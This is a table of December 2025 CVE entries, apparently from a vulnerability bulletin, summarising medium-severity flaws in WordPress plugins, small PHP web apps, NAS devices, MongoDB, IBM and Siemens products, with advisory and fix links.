| uxl--Design Import/Export Styles, Templates, Template Parts and Patterns | The Design Import/Export plugin for WordPress is vulnerable to SQL Injection via XML File Import in all versions up to, and including, 2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-13 | 4.9 | CVE-2025-14050 | https://www.wordfence.com/threat-intel/vulnerabilities/id/beb489d3-2c1b-4af5-b73e-126d2526e0a3?source=cve https://plugins.trac.wordpress.org/browser/design-import-export/trunk/includes/importer.php#L162 https://plugins.trac.wordpress.org/browser/design-import-export/tags/2.2/includes/importer.php#L162 https://plugins.trac.wordpress.org/changeset/3416324 |
| webdevstudios--Custom Post Type UI | The Custom Post Type UI plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'label' parameter during custom post type import in all versions up to, and including, 1.18.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses the Tools → Get Code page. | 2025-12-13 | 4.4 | CVE-2025-14056 | https://www.wordfence.com/threat-intel/vulnerabilities/id/890c743e-da5e-46ed-a011-cecd24778163?source=cve https://plugins.trac.wordpress.org/browser/custom-post-type-ui/trunk/inc/tools-sections/tools-post-types.php#L201 https://plugins.trac.wordpress.org/browser/custom-post-type-ui/tags/1.18.1/inc/tools-sections/tools-post-types.php#L201 https://github.com/WebDevStudios/custom-post-type-ui/pull/1014/files#diff-bd3331205024f12a78d74b312bc4f5ad118b5734999bf53a4a95e0959891f60a |
| tekafran--Animated Pixel Marquee Creator | The Animated Pixel Marquee Creator plugin for WordPress is vulnerable to Cross-Site Request Forgery via the 'marquee' parameter in all versions up to, and including, 1.0.0. This is due to missing nonce validation on the marquee deletion function. This makes it possible for unauthenticated attackers to delete arbitrary marquees via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-14062 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c727ab41-c091-4fff-8abe-f52a904cd9f0?source=cve https://plugins.trac.wordpress.org/browser/animated-pixel-marquee-creator/trunk/admin/marquees_list.php#L44 https://plugins.trac.wordpress.org/browser/animated-pixel-marquee-creator/tags/1.0.0/admin/marquees_list.php#L44 |
| octagonsimon--Coding Blocks | The Coding Blocks plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.0. This is due to missing nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to update plugin settings including the theme configuration via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-14158 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5a4833de-d530-4bbf-ac28-e5d4b5f68f1e?source=cve https://plugins.trac.wordpress.org/browser/coding-blocks/trunk/admin/pages/settings.php#L11 https://plugins.trac.wordpress.org/browser/coding-blocks/tags/1.1.0/admin/pages/settings.php#L11 https://wordpress.org/plugins/coding-blocks/#developers |
| ays-pro--Secure Copy Content Protection and Content Locking | The Secure Copy Content Protection and Content Locking plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.9.2. This is due to missing nonce validation on the 'ays_sccp_results_export_file' AJAX action. This makes it possible for unauthenticated attackers to export sensitive plugin data including email addresses, IP addresses, physical addresses, user IDs, and other user information via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The exported data is stored in a publicly accessible file, allowing attackers to receive the sensitive information even though they are not authenticated. | 2025-12-12 | 4.3 | CVE-2025-14159 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7cffe04e-a2e5-4752-a5c1-7c95f0007e0b?source=cve https://wordpress.org/plugins/secure-copy-content-protection/#developers https://plugins.trac.wordpress.org/browser/secure-copy-content-protection/tags/4.8.7/admin/class-secure-copy-content-protection-admin.php#L645 https://plugins.trac.wordpress.org/browser/secure-copy-content-protection/tags/4.9.3/admin/class-secure-copy-content-protection-admin.php#L696 |
| justdave--Upcoming for Calendly | The Upcoming for Calendly plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.4. This is due to missing nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to update the plugin's Calendly API key via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-14160 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d66d6f36-ad16-40ba-b32f-f4aff6f8b494?source=cve https://plugins.trac.wordpress.org/browser/upcoming-for-calendly/trunk/includes/settings.php#L33 https://plugins.trac.wordpress.org/browser/upcoming-for-calendly/tags/1.2.4/includes/settings.php#L33 https://wordpress.org/plugins/upcoming-for-calendly/#developers https://plugins.trac.wordpress.org/changeset/3415892/ |
| truefy--Truefy Embed | The Truefy Embed plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.0. This is due to missing nonce validation on the 'truefy_embed_options_update' settings update action. This makes it possible for unauthenticated attackers to update the plugin's settings, including the API key, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-14161 | https://www.wordfence.com/threat-intel/vulnerabilities/id/74ad664d-5cfa-481c-a318-30999c43e4ac?source=cve https://plugins.trac.wordpress.org/browser/truefy-embed/trunk/truefy.php#L431 https://plugins.trac.wordpress.org/browser/truefy-embed/tags/1.1.0/truefy.php#L431 |
| magblogapi--BMLT WordPress Plugin | The BMLT WordPress Plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.11.4. This is due to missing nonce validation on the 'BMLTPlugin_create_option' and 'BMLTPlugin_delete_option ' action. This makes it possible for unauthenticated attackers to create new plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-14162 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0344f49b-f5f9-4729-ade0-cba6289406de?source=cve https://plugins.trac.wordpress.org/browser/bmlt-wordpress-satellite-plugin/trunk/vendor/bmlt/bmlt-satellite-base-class/bmlt-cms-satellite-plugin.php#L848 https://plugins.trac.wordpress.org/browser/bmlt-wordpress-satellite-plugin/tags/3.11.4/vendor/bmlt/bmlt-satellite-base-class/bmlt-cms-satellite-plugin.php#L848 |
| developerke--Kirim.Email WooCommerce Integration | The Kirim.Email WooCommerce Integration plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.9. This is due to missing nonce validation on the plugin's settings page. This makes it possible for unauthenticated attackers to modify the plugin's API credentials and integration settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-14165 | https://www.wordfence.com/threat-intel/vulnerabilities/id/70993f6f-d9b0-49d5-b35e-e129f96529f6?source=cve https://plugins.trac.wordpress.org/browser/kirimemail-woocommerce-integration/trunk/includes/class-kirimemail-woocommerce.php#L113 https://plugins.trac.wordpress.org/browser/kirimemail-woocommerce-integration/tags/1.2.9/includes/class-kirimemail-woocommerce.php#L113 https://plugins.trac.wordpress.org/browser/kirimemail-woocommerce-integration/trunk/includes/class-kirimemail-woocommerce.php#L137 https://plugins.trac.wordpress.org/browser/kirimemail-woocommerce-integration/tags/1.2.9/includes/class-kirimemail-woocommerce.php#L137 |
| Campcodes--Retro Basketball Shoes Online Store | A weakness has been identified in Campcodes Retro Basketball Shoes Online Store 1.0. The impacted element is an unknown function of the file /admin/admin_running.php. Executing manipulation of the argument product_image can lead to unrestricted upload. It is possible to launch the attack remotely. The exploit has been made available to the public and could be exploited. | 2025-12-08 | 4.7 | CVE-2025-14219 | VDB-334661 | Campcodes Retro Basketball Shoes Online Store admin_running.php unrestricted upload VDB-334661 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #701209 | Campcodes Retro Basketball Shoes Online Store V1.0 Unrestricted Upload https://github.com/yyue02/cve/issues/1 https://www.campcodes.com/ |
| ORICO--CD3510 | A security vulnerability has been detected in ORICO CD3510 1.9.12. This affects an unknown function of the component File Upload. The manipulation leads to path traversal. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-08 | 4.3 | CVE-2025-14220 | VDB-334662 | ORICO CD3510 File Upload path traversal VDB-334662 | CTI Indicators (IOB, IOC, TTP) Submit #701302 | ORICO CD3510 NAS V1.9.12 Incorrect Access Control https://www.notion.so/2b66cf4e528a8002aa39df57a71b105a |
| Yottamaster--DM2 | A vulnerability was found in Yottamaster DM2, DM3 and DM200 up to 1.2.23/1.9.12. Affected by this issue is some unknown functionality of the component File Upload. Performing manipulation results in path traversal. Remote exploitation of the attack is possible. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-08 | 4.3 | CVE-2025-14224 | VDB-334666 | Yottamaster DM2/DM3/DM200 File Upload path traversal VDB-334666 | CTI Indicators (IOB, IOC, TTP) Submit #701673 | Yottamaster DM200 V1.2.23 Vertical Privilege Escalation https://www.notion.so/2b76cf4e528a80f6ae50fe21b13ff0b8 |
| SourceCodester--Inventory Management System | A security vulnerability has been detected in SourceCodester Inventory Management System 1.0. The affected element is an unknown function of the component SVC Report Export. Such manipulation leads to csv injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. | 2025-12-08 | 4.7 | CVE-2025-14229 | VDB-334671 | SourceCodester Inventory Management System SVC Report Export csv injection VDB-334671 | CTI Indicators (IOB, IOC) Submit #702119 | SourceCodester Inventory Management System 1.0 CSV Injection https://www.notion.so/Spreadsheet-Formula-Injection-Leading-to-Remote-Code-Execution-in-SourceCodester-Inventory-Managemen-2b723917db8c80dfaaabe2b74d6f283d?source=copy_link https://www.sourcecodester.com/ |
| Galaxy Software Services--Vitals ESP | Vitals ESP developed by Galaxy Software Services has an Arbitrary File Read vulnerability, allowing privileged remote attackers to exploit Absolute Path Traversal to download arbitrary system files. | 2025-12-08 | 4.9 | CVE-2025-14253 | https://www.twcert.org.tw/tw/cp-132-10542-4c682-1.html https://www.twcert.org.tw/en/cp-139-10543-380bd-2.html |
| gallerycreator--Gallery Blocks with Lightbox. Image Gallery, (HTML5 video , YouTube, Vimeo) Video Gallery and Lightbox for native gallery | The Gallery Blocks with Lightbox. Image Gallery, (HTML5 video , YouTube, Vimeo) Video Gallery and Lightbox for native gallery plugin for WordPress is vulnerable to unauthorized modification of plugin settings in all versions up to, and including, 3.3.0. This is due to the plugin using the `edit_posts` capability check instead of `manage_options` for the `update_option` action type in the `pgc_sgb_action_wizard` AJAX handler. This makes it possible for authenticated attackers, with Contributor-level access and above, to modify arbitrary plugin settings prefixed with `pgc_sgb_*`. | 2025-12-13 | 4.3 | CVE-2025-14288 | https://www.wordfence.com/threat-intel/vulnerabilities/id/60ab0311-888c-46ae-98fe-9e7d4dfe13bf?source=cve https://plugins.trac.wordpress.org/browser/simply-gallery-block/tags/3.2.8/plugin.php#L593 https://plugins.trac.wordpress.org/changeset/3418101/simply-gallery-block/trunk/plugin.php?old=3415010&old_path=simply-gallery-block%2Ftrunk%2Fplugin.php |
| MongoDB Inc.--MongoDB Server | A post-authentication flaw in the network two-phase commit protocol used for cross-shard transactions in MongoDB Server may lead to logical data inconsistencies under specific conditions which are not predictable and exist for a very short period of time. This error can cause the transaction coordination logic to misinterpret the transaction as committed, resulting in inconsistent state on those shards. This may lead to low integrity and availability impact. This issue impacts MongoDB Server v8.0 versions prior to 8.0.16, MongoDB Server v7.0 versions prior to 7.0.26 and MongoDB server v8.2 versions prior to 8.2.2. | 2025-12-09 | 4.2 | CVE-2025-14345 | https://jira.mongodb.org/browse/SERVER-106075 |
| doubledome--Resource Library for Logged In Users | The Resource Library for Logged In Users plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4. This is due to missing nonce validation on multiple administrative functions. This makes it possible for unauthenticated attackers to perform various unauthorized actions including creating, editing, and deleting resources and categories via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-14354 | https://www.wordfence.com/threat-intel/vulnerabilities/id/71b82f1e-14ae-4eb3-9b46-5fcea1cd5a32?source=cve https://plugins.trac.wordpress.org/browser/doubledome-resource-link-library/trunk/includes/class-ddrll.php#L406 https://plugins.trac.wordpress.org/browser/doubledome-resource-link-library/tags/1.4/includes/class-ddrll.php#L406 https://plugins.trac.wordpress.org/browser/doubledome-resource-link-library/trunk/includes/class-ddrll.php#L168 https://plugins.trac.wordpress.org/browser/doubledome-resource-link-library/tags/1.4/includes/class-ddrll.php#L168 https://plugins.trac.wordpress.org/browser/doubledome-resource-link-library/trunk/includes/class-ddrll.php#L530 https://plugins.trac.wordpress.org/browser/doubledome-resource-link-library/tags/1.4/includes/class-ddrll.php#L530 |
| themefic--Ultra Addons for Contact Form 7 | The Ultra Addons for Contact Form 7 plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'uacf7_get_generated_pdf' function in all versions up to, and including, 3.5.33. This makes it possible for authenticated attackers, with Subscriber-level access and above, to generate and get form submission PDF, when the "PDF Generator" and the "Database" addons are enabled (disabled by default). | 2025-12-12 | 4.3 | CVE-2025-14356 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3af9ece0-1556-4457-87ee-343daec5e74f?source=cve https://plugins.trac.wordpress.org/browser/ultimate-addons-for-contact-form-7/trunk/addons/pdf-generator/pdf-generator.php#L316 https://plugins.trac.wordpress.org/browser/ultimate-addons-for-contact-form-7/trunk/addons/pdf-generator/pdf-generator.php#L321 https://plugins.trac.wordpress.org/browser/ultimate-addons-for-contact-form-7/trunk/addons/pdf-generator/pdf-generator.php#L341 https://plugins.trac.wordpress.org/browser/ultimate-addons-for-contact-form-7/trunk/addons/pdf-generator/pdf-generator.php#L53 https://plugins.trac.wordpress.org/changeset/3417590/ultimate-addons-for-contact-form-7 |
| themeregion--Quick Testimonials | The Quick Testimonials plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-12-13 | 4.4 | CVE-2025-14378 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1907308f-a722-48ce-8da4-a6c21ee29575?source=cve https://wordpress.org/plugins/quick-testimonials/ |
| darendev--Simple Theme Changer | The Simple Theme Changer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0. This is due to missing or incorrect nonce validation. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-12 | 4.3 | CVE-2025-14391 | https://www.wordfence.com/threat-intel/vulnerabilities/id/efa9b44d-8b6c-4a11-82af-cecc2c202024?source=cve https://plugins.trac.wordpress.org/browser/simple-theme-changer/tags/1.0/class_theme_changer.php#L262 |
| darendev--Simple Theme Changer | The Simple Theme Changer plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the user_theme_admin, display_method_admin, and set_change_theme_button_name actions actions in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify the plugin's settings. | 2025-12-12 | 4.3 | CVE-2025-14392 | https://www.wordfence.com/threat-intel/vulnerabilities/id/880712ee-373f-49e7-93e3-968f3a0f3f83?source=cve https://plugins.trac.wordpress.org/browser/simple-theme-changer/tags/1.0/class_theme_changer.php#L262 |
| melodicmedia--Popover Windows | The Popover Windows plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2. This is due to missing or incorrect nonce validation. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-13 | 4.3 | CVE-2025-14394 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c2af263f-960b-4807-bc85-d136136fa30f?source=cve https://plugins.trac.wordpress.org/browser/popover-windows/tags/1.2/popoveroptions.php#L98 |
| melodicmedia--Popover Windows | The Popover Windows plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on multiple ajax actions (e.g., pop_submit, poptheme_submit) in all versions up to, and including, 1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify the plugin's settings and content. | 2025-12-13 | 4.3 | CVE-2025-14395 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0cae43cb-a0b7-4067-95b3-26fec31ebf42?source=cve https://plugins.trac.wordpress.org/browser/popover-windows/tags/1.2/popoveroptions.php#L98 |
| solutionsbysteve--Solutions Ad Manager | The Solutions Ad Manager plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.0.0. This is due to insufficient validation on the redirect URL supplied via the 'sam-redirect-to' parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action. | 2025-12-13 | 4.7 | CVE-2025-14451 | https://www.wordfence.com/threat-intel/vulnerabilities/id/696495c5-c8f8-4790-af89-1ee911767b1b?source=cve https://plugins.trac.wordpress.org/browser/solutions-ad-manager/trunk/public/class-solutions-ad-manager-public.php#L30 https://plugins.trac.wordpress.org/browser/solutions-ad-manager/tags/1.0.0/public/class-solutions-ad-manager-public.php#L30 |
| ays-pro--Image Slider by Ays- Responsive Slider and Carousel | The Image Slider by Ays- Responsive Slider and Carousel plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.7.0. This is due to missing or incorrect nonce validation on the bulk delete functionality. This makes it possible for unauthenticated attackers to delete arbitrary sliders via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-13 | 4.3 | CVE-2025-14454 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e211df80-aab7-43a1-8c11-a472f90ef4c6?source=cve https://plugins.trac.wordpress.org/browser/ays-slider/trunk/includes/lists/class-ays-slider-list-table.php#L430 https://plugins.trac.wordpress.org/browser/ays-slider/tags/2.7.0/includes/lists/class-ays-slider-list-table.php#L430 https://plugins.trac.wordpress.org/changeset/3417916/ays-slider/tags/2.7.1/includes/lists/class-ays-slider-list-table.php?old=3278880&old_path=ays-slider%2Ftags%2F2.7.0%2Fincludes%2Flists%2Fclass-ays-slider-list-table.php |
| owais4377--Lucky Draw Contests | The Lucky Draw Contests plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.2. This is due to missing or incorrect nonce validation in misc-settings.php. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-13 | 4.3 | CVE-2025-14462 | https://www.wordfence.com/threat-intel/vulnerabilities/id/49364a21-775a-4de0-84f8-e62aa1a5fefd?source=cve https://plugins.trac.wordpress.org/browser/lucky-draw/tags/4.2/includes/misc-settings.php |
| wpjobportal--WP Job Portal AI-Powered Recruitment System for Company or Job Board website | The WP Job Portal plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.3.9. This is due to the plugin explicitly whitelisting the `<script>` tag in its `WPJOBPORTAL_ALLOWED_TAGS` configuration and using insufficient input sanitization when saving job descriptions. This makes it possible for authenticated attackers, with Editor-level access and above, to inject arbitrary web scripts into job description fields via the job creation/editing interface. These scripts will execute whenever a user accesses an injected page, enabling session hijacking, credential theft, and other malicious activities. This only impacts multi-site installations, or those with unfiltered_html disabled. | 2025-12-12 | 4.4 | CVE-2025-14467 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0c347b9f-d297-4cb5-9c4a-1001d845ed5a?source=cve https://plugins.trac.wordpress.org/browser/wp-job-portal/tags/2.3.9/includes/constants.php#L351 https://plugins.trac.wordpress.org/browser/wp-job-portal/trunk/includes/constants.php#L351 https://plugins.trac.wordpress.org/browser/wp-job-portal/trunk/modules/job/model.php#L1278 https://plugins.trac.wordpress.org/browser/wp-job-portal/tags/2.3.9/modules/job/model.php#L1278 https://plugins.trac.wordpress.org/browser/wp-job-portal/trunk/modules/job/tmpl/views/frontend/title.php#L231 https://plugins.trac.wordpress.org/browser/wp-job-portal/tags/2.3.9/modules/job/tmpl/views/frontend/title.php#L231 |
| aaron13100--404 Solution | The 404 Solution plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 3.1.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This is due to improper sanitization of the `filterText` parameter in the `ajaxUpdatePaginationLinks` AJAX action. The sanitization logic can be bypassed by using the sequence `*$/` which becomes `*/` after the `$` character is removed, allowing attackers to escape SQL comment contexts. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database via a time-based blind SQL injection technique. | 2025-12-13 | 4.9 | CVE-2025-14477 | https://www.wordfence.com/threat-intel/vulnerabilities/id/389bee79-b59f-484a-86df-f041d6b00051?source=cve https://plugins.trac.wordpress.org/browser/404-solution/tags/2.36.10/includes/DataAccess.php#L977 https://plugins.trac.wordpress.org/browser/404-solution/tags/2.36.10/includes/DataAccess.php#L987 https://plugins.trac.wordpress.org/browser/404-solution/tags/2.36.10/includes/PluginLogic.php#L1595 https://plugins.trac.wordpress.org/browser/404-solution/tags/2.36.10/includes/sql/getRedirectsForView.sql#L106 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3417333%40404-solution&new=3417333%40404-solution&sfp_email=&sfph_mail= |
| baowzh--hfly | A security vulnerability has been detected in baowzh hfly up to 638ff9abe9078bc977c132b37acbe1900b63491c. The affected element is an unknown function of the file /admin/index.php/datafile/download. Such manipulation of the argument filename leads to path traversal. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-11 | 4.3 | CVE-2025-14521 | VDB-335859 | baowzh hfly download path traversal VDB-335859 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702949 | GitHub hfly 1.0 Arbitrary file reading https://github.com/Xor-Gerke/webray.com.cn/blob/main/cve/PHP-based%20travel%20website-CMS/PHP-based%20travel%20website-CMS%20download%20filename%20Arbitrary%20file%20reading.md |
| SourceCodester--Real Estate Property Listing App | A vulnerability has been found in SourceCodester Real Estate Property Listing App 1.0. The impacted element is an unknown function of the file /admin/property.php. Such manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-12-11 | 4.7 | CVE-2025-14530 | VDB-335871 | SourceCodester Real Estate Property Listing App property.php unrestricted upload VDB-335871 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #703238 | SourceCodester Real Estate Property Listing App Using PHP and MySQL with Source Code 1 Unrestricted Upload https://github.com/zzdzz7/cve/issues/2 https://www.sourcecodester.com/ |
| code-projects--Rental Management System | A vulnerability was found in code-projects Rental Management System 2.0. This affects an unknown function of the file Transaction.java of the component Log Handler. Performing manipulation results in crlf injection. The attack can be initiated remotely. The exploit has been made public and could be used. | 2025-12-11 | 4.3 | CVE-2025-14531 | VDB-335872 | code-projects Rental Management System Log Transaction.java crlf injection VDB-335872 | CTI Indicators (IOB, IOC, IOA) Submit #703239 | code-projects rental-management-system 2.0 CRLF Injection https://github.com/asd1238525/cve/blob/main/CRLF.md https://code-projects.org/ |
| userback--Userback | The Userback plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the userback_get_json function in all versions up to, and including, 1.0.15. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract plugin's configuration data including the Userback API access token and site's posts/pages contents, including those that have private and draft status. | 2025-12-13 | 4.3 | CVE-2025-14540 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1add8693-20df-431e-ad3b-b23322f1fa03?source=cve https://plugins.trac.wordpress.org/browser/userback/tags/1.0.15/index.php#L148 |
| campcodes--Online Student Enrollment System | A vulnerability was detected in campcodes Online Student Enrollment System 1.0. This affects an unknown function of the file /admin/index.php?page=user-profile. Performing manipulation of the argument userphoto results in unrestricted upload. The attack can be initiated remotely. The exploit is now public and may be used. | 2025-12-12 | 4.7 | CVE-2025-14582 | VDB-336202 | campcodes Online Student Enrollment System index.php unrestricted upload VDB-336202 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #705524 | campcodes Online Student Enrollment System V1.0 Unrestricted Upload https://github.com/CHENCHOUCHOU/vuln/issues/2 https://www.campcodes.com/ |
| code-projects--Computer Laboratory System | A flaw has been found in code-projects Computer Laboratory System 1.0. This issue affects some unknown processing of the file admin/admin_pic.php. This manipulation of the argument image causes unrestricted upload. The attack may be initiated remotely. The exploit has been published and may be used. | 2025-12-14 | 4.7 | CVE-2025-14641 | VDB-336374 | code-projects Computer Laboratory System admin_pic.php unrestricted upload VDB-336374 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707865 | code-projects.org Computer Laboratory System In PHP With Source Code 1.0 Unrestricted Upload https://github.com/Yohane-Mashiro/cve/blob/main/upload%203.md https://code-projects.org/ |
| code-projects--Computer Laboratory System | A vulnerability has been found in code-projects Computer Laboratory System 1.0. Impacted is an unknown function of the file technical_staff_pic.php. Such manipulation of the argument image leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-12-14 | 4.7 | CVE-2025-14642 | VDB-336375 | code-projects Computer Laboratory System technical_staff_pic.php unrestricted upload VDB-336375 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #707866 | ode-projects.org Computer Laboratory System In PHP With Source Code 1.0 Incomplete Identification of Uploaded File Variables https://github.com/Yohane-Mashiro/cve/blob/main/upload%204.md https://code-projects.org/ |
| n/a--DedeBIZ | A security vulnerability has been detected in DedeBIZ up to 6.5.9. Affected by this vulnerability is an unknown functionality of the file /src/admin/catalog_add.php. Such manipulation leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. | 2025-12-14 | 4.7 | CVE-2025-14648 | VDB-336381 | DedeBIZ catalog_add.php command injection VDB-336381 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #710164 | DedeBIZ 6.5.9 Code Injection https://github.com/HOrange147/CVE/blob/main/DedeBIZ%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C.pdf |
| Mayan--EDMS | A vulnerability was detected in Mayan EDMS up to 4.10.1. The affected element is an unknown function of the file /authentication/. The manipulation results in cross site scripting. The attack may be performed from remote. The exploit is now public and may be used. Upgrading to version 4.10.2 is sufficient to fix this issue. You should upgrade the affected component. The vendor confirms that this is "[f]ixed in version 4.10.2". Furthermore, that "[b]ackports for older versions in process and will be out as soon as their respective CI pipelines complete." | 2025-12-14 | 4.3 | CVE-2025-14691 | VDB-336409 | Mayan EDMS authentication cross site scripting VDB-336409 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #711713 | Mayan EDMS CMS 4.10 Cross Site Scripting https://github.com/ionutluca888/Mayan-EDMS-XSS-POC https://docs.mayan-edms.com/chapters/releases/4.10.2.html https://docs.mayan-edms.com/chapters/releases/4.10.2.html#security |
| Mayan--EDMS | A flaw has been found in Mayan EDMS up to 4.10.1. The impacted element is an unknown function of the file /authentication/. This manipulation causes open redirect. It is possible to initiate the attack remotely. The exploit has been published and may be used. Upgrading to version 4.10.2 is sufficient to resolve this issue. The affected component should be upgraded. The vendor confirms that this is "[f]ixed in version 4.10.2". Furthermore, that "[b]ackports for older versions in process and will be out as soon as their respective CI pipelines complete." | 2025-12-14 | 4.3 | CVE-2025-14692 | VDB-336410 | Mayan EDMS authentication redirect VDB-336410 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #711729 | Mayan EDMS CMS 4.10 Open Redirect https://github.com/ionutluca888/Mayan-EDMS-OpenRedirect-POC/tree/main https://docs.mayan-edms.com/chapters/releases/4.10.2.html https://docs.mayan-edms.com/chapters/releases/4.10.2.html#security |
| IBM--Controller | IBM Controller 11.1.0 through 11.1.1 and IBM Cognos Controller 11.0.0 through 11.0.1 FP6 is vulnerable to creation of temporary files without atomic operations which may expose sensitive information to an authenticated user due to race condition attacks. | 2025-12-08 | 4.3 | CVE-2025-33111 | https://www.ibm.com/support/pages/node/7253273 |
| IBM--IBM Planning Analytics Local | IBM Planning Analytics Local 2.1.0 - 2.1.15 could disclose sensitive information about server architecture that could aid in further attacks against the system. | 2025-12-09 | 4.3 | CVE-2025-36437 | https://www.ibm.com/support/pages/node/7253603 |
| Siemens--SINEMA Remote Connect Server | A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V3.2 SP4). Affected applications do not properly validate license restrictions against the database, allowing direct modification of the system_ticketinfo table to bypass license limitations without proper enforcement checks. This could allow with database access to circumvent licensing restrictions by directly modifying database values and potentially enabling unauthorized use beyond the permitted scope. | 2025-12-09 | 4.3 | CVE-2025-40819 | https://cert-portal.siemens.com/productcert/html/ssa-626856.html |
